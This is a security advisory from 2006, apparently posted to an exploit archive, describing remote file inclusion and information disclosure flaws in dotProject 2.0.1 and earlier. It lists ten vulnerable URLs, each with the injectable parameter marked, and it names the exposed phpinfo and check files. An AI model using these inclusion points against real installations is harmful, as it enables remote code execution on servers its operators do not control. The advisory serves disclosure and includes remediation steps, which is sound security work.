dotProject-2.0.1.txt

dotProject-2.0.1.txt: Posted Feb 14, 2006; Authored by Robin Verton; dotProject versions 2.0.1 and below are vulnerable to multiple arbitrary code execution and information disclosure problems.; tags | exploit, arbitrary, code execution, info disclosure; SHA-256 | 65d278cfd1e0fb5de0c01a4650d9eb60a82d1f8ca72d701d3d4d18e7db65063f; Download | Favorite | View

dotProject-2.0.1.txt

dotproject <= 2.0.1 remote code execution
======================================

  Software: dotProject <= 2.0.1
     Severity: Arbitrary code execution, Path/Information Disclosure
     Risk: High
     Author: Robin Verton <r.verton@gmail.com>
     Date: Feb. 14 2006
     Vendor: dotproject.net [contacted]

  Description:
   dotProject is a volunteer supported Project Management application.

  Details:
   The 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter.
   Some user-supplied input is not checked correctly so an attacker can include a remote php file and
   execute arbitrary phpcode or arbitrary system command via eval().

   Because there are over 10 Bugs I only post the vulnerable files + parameters which are not checked.
   To exploit these vulnerables register_globals have to be set ON (default).

   1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]
 
   2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE]
 
   3) /includes/session.php?baseDir=[REMOTE INCLUDE]
   
   4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
 
   5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
 
   6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
 
   7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
 
   8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
 
   9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
 
   10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]

   There are also some path discolsure bugs:

   Nearly ALL files in /db/ give out some nice php-errors by accessing them directly with the parameter
   baseDir=foobar.

   Then, if the /doc/ directory is not deleted (default) you can access to two varoius files which
   disclose you some system informations:

   1) /docs/phpinfo.php - A phpinfo() file.
 
   2) /docs/check.php - Some more informations about the installed dotProject.

  Solution:
   Turn register_globals OFF, delete the /docs/ dir and cover /db/ dir with an htaccess.

  Timeline:
   24.01.2006 - Bugs found
   26.01.2006 - Vendor Contacted
   14.02.2006 - Publishing

  Credits:
   Credits go to Robin Verton (r.verton [at] gmail [dot] com)

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 62 files
Debian 23 files
LiquidWorm 20 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

dotProject-2.0.1.txt

dotProject-2.0.1.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

dotProject-2.0.1.txt

Share This

dotProject-2.0.1.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems